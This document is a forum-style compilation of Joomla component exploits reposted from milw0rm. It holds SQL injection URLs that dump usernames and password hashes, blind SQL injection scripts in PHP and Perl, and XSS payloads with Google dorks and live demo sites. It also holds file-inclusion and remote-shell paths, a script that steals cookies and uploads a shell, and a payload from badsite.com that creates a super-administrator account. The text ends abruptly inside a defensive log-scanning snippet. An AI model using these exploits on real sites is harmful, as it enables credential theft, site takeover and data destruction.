Joomla
Component: Fantasytournament (com_fantasytournament)
Version: 2009.1.5
Vulnerability: SQL injection
Code:
http://localhost/Path/index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
Code:
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
Code:
http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
Author: "Adrian Gray"

Component: Camelcitydb2 (com_camelcitydb2)
Version: 2.2
Vulnerability: SQL injection
Code:
http://localhost/Path/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
Author: "Noel Hunter"
Joomla
Component: com_Eventing 1.6.x
Vulnerability: SQL Injection
Exploit
PHP:
<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# Joomla com_Eventing Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# [email protected]
# == Writing by Stack - thx m8 - ==
#
# usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1"
#
##############################################################################
');
if ($argc > 1) {
    $url = $argv[1];
    $r = strlen(file_get_contents($url."+and+1=1--"));
    echo "\nExploiting:\n";
    $w = strlen(file_get_contents($url."+and+1=0--"));
    $t = abs((100-($w/$r*100)));
    echo "Username: ";
    for ($i=1; $i <= 30; $i++) {
        $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
        if (abs((100-($laenge/$r*100))) > $t-1) {
            $count = $i;
            $i = 30;
        }
    }
    for ($j = 1; $j < $count; $j++) {
        for ($i = 46; $i <= 122; $i=$i+2) {
            if ($i == 60) { $i = 98; }
            $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo chr($i-1);
                } else {
                    echo chr($i);
                }
                $i = 122;
            }
        }
    }
    echo "\nPassword: ";
    for ($j = 1; $j <= 49; $j++) {
        for ($i = 46; $i <= 102; $i=$i+2) {
            if ($i == 60) { $i = 98; }
            $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo chr($i-1);
                } else {
                    echo chr($i);
                }
                $i = 102;
            }
        }
    }
}
?>
# milw0rm.com [2009-01-15]

Component: RD-Autos 1.5.2
Vulnerability: SQL Injection Vulnerability
[~] Exploit Code:
/index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example Code:
/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54
Joomla
Component: Gigcal 1.x
Vulnerability: SQL Injection Vulnerability
Exploit:
Code:
http://localhost/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*

Component: com_pccookbook
Vulnerability: Blind SQL Injection
Exploit
Perl:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1]) {
    print " \n";
    print " #########################################################################\n";
    print " # \n";
    print " # Joomla com_pccookbook Blind sql injection exploit \n";
    print " # \n";
    print " # Cyb3R-1sT \n";
    print " # cyb3r-1st[at]hotmail.com \n";
    print " # \n";
    print " # Usage:perl file.pl host path <options> \n";
    print " # example: perl file.pl www.host.com /joomla/ -a 7 \n";
    print " # \n";
    print " # Options: -a id \n";
    print " # \n";
    print " #########################################################################\n";
    exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"}) { $userid = $options{"u"}; }
if($options{"a"}) { $aid = $options{"a"}; }
syswrite(STDOUT, "[~] Password: ", 14);
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;
    my $h = 48;
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $userid, $aid, $i, $h)) {
            $f = 1;
            syswrite(STDOUT, chr($h), 1);
        }
        $h++;
    }
    if(!$f) {
        $h = 97;
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $userid, $aid, $i, $h)) {
                $f = 1;
                syswrite(STDOUT, chr($h), 1);
            }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";
sub istrue2 {
    my $host = shift;
    my $path = shift;
    my $uid = shift;
    my $aid = shift;
    my $i = shift;
    my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
    if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
    my $resp = $ua->get($query);
    my $content = $resp->content;
    my $regexp = "Ingredients";
    if($content =~ /$regexp/) { return 1; } else { return 0; }
}

Component: com_news
Vulnerability: SQL Injection Vulnerability
Exploit:
Code:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--

Component: com_waticketsystem
Vulnerability: Blind SQL Injection
Exploit
PHP:
<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# Joomla com_waticketsystem Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# [email protected]
# == inject0r5 t3am ==
#
# usage : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
#
##############################################################################
');
if ($argc > 1) {
    $url = $argv[1];
    $r = strlen(file_get_contents($url."+and+1=1--"));
    echo "\nExploiting:\n";
    $w = strlen(file_get_contents($url."+and+1=0--"));
    $t = abs((100-($w/$r*100)));
    echo "Username: ";
    for ($i=1; $i <= 30; $i++) {
        $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
        if (abs((100-($laenge/$r*100))) > $t-1) {
            $count = $i;
            $i = 30;
        }
    }
    for ($j = 1; $j < $count; $j++) {
        for ($i = 46; $i <= 122; $i=$i+2) {
            if ($i == 60) { $i = 98; }
            $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo chr($i-1);
                } else {
                    echo chr($i);
                }
                $i = 122;
            }
        }
    }
    echo "\nPassword: ";
    for ($j = 1; $j <= 49; $j++) {
        for ($i = 46; $i <= 102; $i=$i+2) {
            if ($i == 60) { $i = 98; }
            $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo chr($i-1);
                } else {
                    echo chr($i);
                }
                $i = 102;
            }
        }
    }
}
?>
Joomla Component beamospetition 1.0.12 SQL Injection / XSS - http://www.milw0rm.com/exploits/7847
Joomla com_pcchess (game_id) Blind SQL Injection Exploit - http://www.milw0rm.com/exploits/7846
Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability - http://www.milw0rm.com/exploits/7841
Joomla Com BazaarBuilder Shopping Cart v.5.0 SQL Injection Exploit - http://www.milw0rm.com/exploits/7840
Vulnerabilities in Joomla\Mambo components: XSS

Joomla Component Reservation Manager
Version: 1.7 (last update on Oct 3, 2008)
Type: Commercial (99$)
Vulnerable parameter: year
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_resman"
Demo: http://resman.webformatique.com/index.php?option=com_resman&task=moreinfo&id=1&year=2010"><script>alert(document.cookie)</script>

Joomla Component Car Manager
Version: 2.1 (last update on Jan 6, 2009)
Type: Commercial (129$)
Vulnerable parameter: msg
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_carman"
Demo: http://carman.webformatique.com/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

Joomla Component Time Slot Registration
Version: 1.0.5 (last update on Mar 26, 2008)
Type: Non-Commercial
Vulnerable parameter: entity
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_time_slot_registration"
Demo: http://resadon.fr/index.php?option=com_time_slot_registration&task=viewEventsList&entity="><script>alert(document.cookie)</script>

Joomla Component Hire Manager
Version: 1.2 (last update on Oct 3, 2008)
Type: Commercial (99$)
Vulnerable parameter: msg
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_hireman"
Demo: http://hireman.webformatique.com/index.php?option=com_hireman&msg="><script>alert(document.cookie)</script>

Joomla Component hwdCourses beta
Version: 1.1.1 (last update on Apr 29, 2008)
Type: Non-Commercial
Vulnerable parameters: dif, type
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_hwdcourses"
Demo: http://www.voc.org/index.php?option=com_hwdcourses&Itemid=114&type=Classic"><script>alert(document.cookie)</script>
Joomla com_flashmagazinedeluxe (mag_id) SQL Injection Vulnerability
exploit:
Code:
http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL
Code:
union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
source: http://milw0rm.com/
--------------------------------------------------------------
The End!
This may have been posted already.. delete it if so. I found this site: _http://www.joomlascan.com - I scanned a 1.0.13 with the com_datsogallery module and it found nothing at all - maybe someone else will have better luck. One more tool: _http://sourceforge.net/projects/joomscan/ - looks like a live project.
Component com_xevidmegafx
SQL injection vulnerability in the id parameter: 19 columns, so in theory you can try
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
but I did not find any fields that get displayed, so I brute-forced it as blind SQL.
Code:
############################################
# Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability #
############################################
- dork: inurl:"index.php?option=com_djiceshoutbox"

The script is affected by a Permanent XSS vulnerability, so you can put in bad JavaScript code like:
"><script>alert('XaDoS')</script>
or
'">><script>alert('XSS By XaDoS')</script>
The XSS becomes permanent on every page of the site! Not critical damage, but it's not funny..

[+] D3M0: http://www.djiceatwork.com
contact me at xados @ hotmail . it
www.securitycode.it
# milw0rm.com [2009-03-10]
Joomla Component com_bookjoomlas
Code:
[+] Bugs
- [A] SQL Injection
[-] Security risk: low
[-] File affected: sub_commententry.php
This bug allows a privileged user to view the username and password of a registered user. Like all vulnerable SELECT queries, this can be manipulated to write files on the system.
*************************************************
[+] Code
- [A] SQL Injection
http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
*************************************************
[+] Fix
No fix.
*************************************************
# milw0rm.com [2009-04-06]
Code:
#############################################################################
#                                                                           #
# Joomla Component MailTo SQL Injection Vulnerability                       #
#                                                                           #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "MailTo (com_mailto)"
[~] Date: "April 2006"
########################################
[~] Exploit
/index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
[~] Example
/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
########################################
[~] LiveDemo:
http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
----------------------------------------------------------------+
Code:
#############################################################################
#                                                                           #
# Joomla Component MaianMusic SQL Injection Vulnerability                   #
#                                                                           #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "MaianMusic (com_maianmusic)"
[~] Version: "1.2.1"
[~] Date: "09-26-2008"
[~] Author: "Arelowo Alao & David Bennett"
[~] Author E-mail: "[email protected]"
[~] Author URL: "www.aretimes.com"
########################################
[~] Exploit:
/index.php?option=com_maianmusic&section=category&category=[SQL]&Itemid=70
[~] Example:
/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70
########################################
[~] LiveDemo:
http://musicsunderground.com/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
----------------------------------------------------------------+
Code:
#############################################################################
#                                                                           #
# Joomla Component Cmimarketplace Directory Traversal Vulnerability         #
#                                                                           #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "Cmimarketplace (com_cmimarketplace)"
[~] Date: "August 2008"
[~] Author: "Magnetic Merchandising Inc."
[~] E-mail: "[email protected]"
[~] Author URL: "www.ijobid.com"
########################################
[~] Exploit:
/index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1
[~] Example:
/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Live Demo:
http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
© milw0rm.com [2009-04-08]
Today I had to deal with Joomla 1.5; I started looking for exploits and found this on the official forum: http://forum.joomla.org/viewtopic.php?f=300&t=371705
So I wrote a small exploit:
Code:
<?php
// Deleting arbitrary images in the Joomla catalog
// by [underwater]
$WEB_VULNERABLE = 'http://www.site.com/';
if(!$archive = obt_archive($WEB_VULNERABLE.'images/')){
    echo '<iframe src="'.$WEB_VULNERABLE.'administrator/index.php?option=com_media&task=file.delete&tmpl=component&folder=&rm[]=index.html" width="1" height="1" frameborder="0"></iframe>';
    ob_get_contents();
    sleep(5);
}
if($archive= obt_archive($WEB_VULNERABLE.'images/')){
    foreach($archivos as $valor){
        if(eregi('/', $valor[(count($valor)-1)])){
            $tipo = 'folder';
        }else{
            $tipo = 'file';
        }
        echo '<iframe src="'. $WEB_VULNERABLE.'administrator/index.php?option=com_media&task='.$tipo .'.delete&tmpl=component&folder=&rm[]='.urlencode($valor) .'" width="1" height="1" frameborder="0"></iframe>';
    }
}
function obt_archive($url){
    $buffer = explode(']"> <a href="', file_get_contents($url));
    foreach($buffer as $item=> $valor){
        if($item != '0'){
            $temp = explode('"', $valor);
            $retorn[count($retorno)] = $temp[0];
        }
    }
    return $retorn;
}
?>
Then I found an XSS:
Code:
http://127.0.0.1/joomla/index.php?searchword=%253c%2553%2543%2572%2549%2570%2554%2520%2578%253d%2578%253e%2561%256c%2565%2572%2574%2528%2530%2530%2530%2530%2530%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e&ordering=newest&searchphrase=all&option=com_search
I don't know whether this XSS had been found before me or not, I have not seen it anywhere. The tastiest part is that a shell can be uploaded through it; here is the exploit:
Code:
<?php
error_reporting(0);
$EXPL['SITE_VULNERABLE'] = 'http://127.0.0.1/joomla/';
$EXPL['URL_COM_SHELL'] = 'http://127.0.01/shell'; // Path to the shell
$EXPL['XSS'] = '<script '.
    'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';
if($_GET['act'] == 'js'){
    die('
    var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    function base64_encode(input){
        var output = "";
        var chr1, chr2, chr3;
        var enc1, enc2, enc3, enc4;
        var i = 0;
        do{
            chr1 = input.charCodeAt(i++);
            chr2 = input.charCodeAt(i++);
            chr3 = input.charCodeAt(i++);
            enc1 = chr1 >> 2;
            enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
            enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
            enc4 = chr3 & 63;
            if(isNaN(chr2)){
                enc3 = enc4 = 64;
            }else if(isNaN(chr3)){
                enc4 = 64;
            }
            output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
        }while(i < input.length);
        return output;
    }
    window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
    ');
}elseif($_GET['act'] == 'gall'){
    if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>Нет печенья(</strong>');
    $buffer = http_get($EXPL['SITE_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies);
    $buscar = expl('hidden" name="', $buffer);
    foreach($buscar as $encont){
        $encont = expl('"', $encont);
        $encont = $encont[0];
        if(strlen($encont) == 32){
            $hash = $encont;
            break;
        }
    }
    $buffer = http_post(
        $EXPL['SITE_VULNERABLE'].'/administrator/index.php',
        $cookies,
        $hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
    );
    if(eregi('200 OK', http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){
        // Operation completed successfully! shell at /modules/mod_artimesk/mod_artimesk.php
        header('UnderWhat?!');
        $explot = true;
    }else{
        $explot = false;
    }
    if($archiv_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){
        if($explot){
            fwrite($archiv_handle, 'Шелл успешно загружен'.
            URL: '.$EXPL['SITE_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
            header('location: https://forum.antichat.ru');
        }else{
            fwrite($archiv_handle, .$EXPL['SITIO_VULNERABLE'].' Експлоит не может быть использован, так как не совместима версия, или у вас нету админ прав.'."\x0D\x0A");
        }
        fclose($archiv_handle);
    }
    exit($explot);
}
// Execution of arbitrary JavaScript code
$pedir = $EXPL['SITЕ_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
if(http_get($pedir, 'null[]=token')){
    header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search');
}else{
    die('hola :-s');
}
function http_post($url, $cookies, $postdata){
    $timeout = 100;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
    curl_setopt($ch, CURLOPT_COOKIE, $cookies);
    $conten = curl_exec($ch);
    $error = curl_error($ch);
    curl_close($ch);
    if($conten) return $conten;
    else return $error;
}
function http_get($url, $cookies){
    $timeout = 100;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_COOKIE, $cookies);
    $conten = curl_exec($ch);
    $error = curl_error($ch);
    curl_close($ch);
    if($conten) return $conten;
    else return $error;
}
?>
Joomla Component rsmonials Remote Cross Site Scripting Exploit
Code:
/*
RSMonials XSS Exploit
http://www.rswebsols.com/downloads/category/14-download-rsmonials-all?download=23%3Adownload-rsmonials-component
Google Dork: allinurl:option=com_rsmonials

Anything entered into the form gets rendered as HTML, so you can add tags as long as they don't include quotes (magic quotes eats them, if it's on). This component ships with settings that prevent posting by default, but the administrator page for the testimonials renders your script in its entirety.

Proof of Concept 1: Remote file upload

Visit http://target.com/index.php?option=com_rsmonials and post a comment. At the end of your glowing comment about how awesome the site is, attach this:

<script src=http://badsite.com/evil.js></script>

Now, when your admin goes to the com_rsmonials "Testimonials" page, your script will execute. In this example, a hidden iframe loads up the install page and installs a 'custom' module.
*/
var exploited = false;
var iframe = document.createElement( 'iframe' );
var reg = new RegExp( 'administrator' );
if( reg.test( location.href ) ) {
    iframe.src = 'index.php?option=com_installer';
    iframe.setStyle( 'display', 'none' );
    document.body.appendChild( iframe );
    iframe.addEvent( 'load', exploit );
}
function exploit( e ) {
    if( exploited != true ) {
        var doc = e.target.contentDocument;
        if( !doc ) return;
        var inp = doc.getElementById( 'install_url' );
        inp.value = 'http://badsite.com/exploit.zip';
        var b = inp.parentNode.getElementsByTagName( 'input' )[1];
        b.onclick();
        exploited = true;
    }
}
/*
Proof of Concept 2: New Super Administrator

Here's a drop-in replacement for the 'exploit' function above:

function exploit( e ) {
    if( exploited != true ) {
        var newForm = false;
        var doc = e.target.contentDocument;
        if( !doc ) return;
        var nb = doc.getElementsByTagName( 'a' );
        if( !nb ) return;
        var i = 0;
        for( ; i<nb.length; i++ ) {
            if( nb[i].parentNode.id == 'toolbar-new' ) {
                nb[i].onclick();
            } else if( nb[i].parentNode.id == 'toolbar-save' ) {
                doc.getElementById( 'name' ).value = 'hacked';
                doc.getElementById( 'username' ).value = 'hacked';
                doc.getElementById( 'email' ).value = '[email protected]';
                doc.getElementById( 'password' ).value = 'password';
                doc.getElementById( 'password2' ).value = 'password';
                var g = doc.getElementById( 'gid' );
                g.selectedIndex = g.options.length - 1;
                nb[i].onclick();
                exploited = true;
            }
        }
    }
}

If the admin is a Super Admin, then you could be too... just remember to watch your freemail account for Joomla's account notification!
*/
/* jdc 2009 */
# milw0rm.com [2009-04-22]
com_dictionary
/components/com_dictionary/dictionary.php
PHP:
if($wordid)//a word was selected, its description has to be shown
{
    echo "<h3>Описание</h3>";
    $database->setQuery("SELECT wordid,word,worddescription FROM #__dictionary where wordid=".$wordid);
    $result = $database->query();
    $row = mysql_fetch_object($result);

index.php?option=com_dictionary&Itemid=125&wordid=-3+union+select+1,username,password+from+jos_users
I read about the following vulnerability in some Spanish blog:
http://127.0.0.1/joomla/index.php?option=com_user&task=register
HTML code can be inserted in the username; there is a small filter, which is bypassed with quotes ;P
For example, something like:
Code:
number" onclick="document.location='http://www.site.com/?cookies.php?cookies='+document.cookie" x="
The rest is a matter of technique - a one-pixel picture redirects to the evil script.
This wonder lives here: /administrator/components/com_users/views/user/tmpl/form.php
The funny thing is that the Joomla coders botched exactly the same thing in 10 more files)
Clickheat [for Joomla]
Download: http://www.recly.com/index.php?option=com_recly&task=product_page&id=1

Vuln file: install.clickheat.php
Vuln Code:
Code:
require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=..../../../../../../../etc/passwd%00

Vuln file: _main.php
Vuln Code:
Code:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00

Vuln file: main.php
Vuln Code:
Code:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00

Vuln file: Cache.php
Vuln Code:
Code:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00

Vuln file: Clickheat_Heatmap.php
Vuln Code:
Code:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00

Vuln file: GlobalVariables.php
Vuln Code:
Code:
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00

Well, that's about it...)
Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities
ArtForms 2.1b7 remote file includes
From Turkey iskorpitx (A world brand, it can never be imitated)
// swfmovie.php - swf output and config
/* output captcha image */
/* output captcha mp3 */
----------------------------------------------------------------------------------
Code:
[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell
Code:
[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell
Code:
[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
-----------------------------------------------------------------------------------
by iskorpitx [email protected]
# milw0rm.com [2009-05-15]
Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection
==================================================================================
Joomla Component com_juser (id) SQL injection Vulnerability
==================================================================================
###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine
[+] Email : chipdebios[alt+64]gmail.com
###################################################
Code:
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
Code:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
Code:
http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>[email protected]</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>
# milw0rm.com [2009-06-01]
Joomla Component com_vehiclemanager 1.0 RFI Vulnerability
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Joomla com_vehiclemanager 1.0 Remote File Include
Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Found: xoron
contact: [email protected] (only e-mail)
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Exploit: -> ...
Code:
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Thanx: str0ke, VoLkan
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
# milw0rm.com [2009-06-09]
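As an added defender-side example (not from any post in this thread), the following Python scans web-server access logs for the request shapes quoted above: UNION and blind SQL injection against jos_users, the mosConfig_absolute_path traversal with a %00 terminator, and the double-URL-encoded com_search XSS. The log lines are constructed for the example and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined-log shape, modelled on the request
# forms quoted in this thread. Addresses, timestamps and sizes are made up.
SAMPLE_LOG = '''203.0.113.10 - - [15/Jan/2009:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=5&Itemid=7 HTTP/1.1" 200 5120
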